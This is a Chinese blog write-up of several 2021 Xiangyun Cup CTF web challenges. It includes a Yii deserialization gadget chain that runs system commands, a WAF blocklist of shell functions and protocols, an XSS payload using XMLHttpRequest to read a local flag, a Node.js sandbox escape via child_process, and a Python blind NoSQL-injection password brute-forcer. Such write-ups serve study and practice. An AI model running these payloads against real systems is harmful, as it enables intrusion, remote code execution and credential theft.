2021祥云杯部分WEB

2021祥云杯部分WEB

ezyii

考点:

  • yii反序列化链子

%title插图%num

https://github.com/JinYiTong/poc

<?php
namespace Codeception\Extension{
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
        protected $output;
        private $processes = [];
        public function __construct(){
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker{
    class DefaultGenerator
{
    protected $default;

    public function __construct($default = null)
    {
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
    use Faker\DefaultGenerator;
    final class AppendStream{
        private $streams = [];
        private $seekable = true;
        public function __construct(){
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
        private $remoteStream;
        public function __construct(){
            $this->remoteStream=new DefaultGenerator(false);
            $this->stream=new  PumpStream();
        }
    }
    final class PumpStream{
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
            $this->buffer=new DefaultGenerator('j');
            include("closure/autoload.php");
            $a = function(){system('cat /flag*');phpinfo();   };
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}

安全检测

考点:

  • SSRF
  • session
http://127.0.0.1/admin 有个列目录

%title插图%num

# include123.php

<?php
$u=$_GET['u'];

$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
$pattern .="|file|dict|gopher";
//累了累了,饮茶先

$vpattern = explode("|",$pattern);

foreach($vpattern as $value){    
    if (preg_match( "/$value/i", $u )){
        echo "检测到恶意字符";
        exit(0);
    }
}

include($u);

show_source(__FILE__);
?>

session文件里会记录检测的url,写个马包含就行了,绕下waf就行了,show_source

Secrets_Of_Admin

考点:

  • SSRF
  • 数组绕过

首先看admin路由,content没有检测类型,直接用数组绕,它会把内容保存成pdf

%title插图%num

由下面这个html=pdf洞猜想,通过构造一个xhr请求来达到获取任意文件

%title插图%num

再看/api/files路由,判断remoteAddress,拿username , filename, checksum放到数据库中

%title插图%num

最后是/api/files/:id路由,通过id去获取文件,这里能够去读取恶意文件

%title插图%num

因为写入的内容会渲染到HTML中,所以能够用script标签写入js代码

%title插图%num

content[]=%3Cscript%3Evar%20xhttp%20%3D%20new%20XMLHttpRequest()%3Bxhttp.open(%22GET%22%2C%20%22http%3A%2F%2F127.0.0.1%3A8888%2Fapi%2Ffiles%3Fusername%3Dadmin%26filename%3D.%2Fflag%26checksum%3D12345%22%2C%20true)%3Bxhttp.send()%3B%3C%2Fscript%3E

crawler_z

考点:

  • zombie漏洞
  • 变量覆盖

/profile路由有个正则,满足就会跳转到/user/verify,并生成一个token,

%title插图%num

如果这个token正确,就会更新bucket

%title插图%num

我们先满足正则获取token,但不跟随跳转,然后更新恶意bucket,再用token去访问

https://ha.cker.in/index.php/Article/13563

%title插图%num

%title插图%num

根据这篇文章https://ha.cker.in/index.php/Article/13563

在vps上开个服务放payload

<script>c='constructor';res=this[c][c]("c='constructor';require=this[c][c]('return process')().mainModule.require;var sync=require('child_process').spawnSync; var ls = sync('/readflag'); return ls.output.toString();")().toString();document.write(res)</script>

最后通过访问/user/bucket路由反弹shell

PackageManager2021

%title插图%num

index.ts就是注册登录登出还有一个token验证,package.ts就是一个针对包增删改查的功能

%title插图%num

token 处存在 JavaScript 类型的 Nosql 注入 https://xz.aliyun.com/t/9908#toc-9

import requests

passwd = ""
for i in range(0,50):
    for j in range(32,127):
        url = "http://561085f1-6d16-45fc-be94-5e594f5ed527.node4.buuoj.cn:81/auth"
        cookies = {"session": "s%3AWGx2XRK-lLh6LEuOs5qoG2oy0W58cx9V.9%2BZ8Rx9N02Rzt7Dfne%2B8%2BCzYTcCD3bbSvkRHez9uuz8"}
        burp0_data = {"_csrf": "DLr9xGOK-dE79D7hQRBthJuRK7YUma4_VIBM", "token": "21232f297a57a5a743894a0e4a801fc3\"||(this.username==\"admin\"&&this.password[{}]==\"{}\")||\"".format(i,chr(j))}
        res=requests.post(url, cookies=cookies, data=burp0_data,allow_redirects=False)
        if res.status_code == 302:
            passwd += chr(j)
            print(passwd)

得到密码后直接登陆admin

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇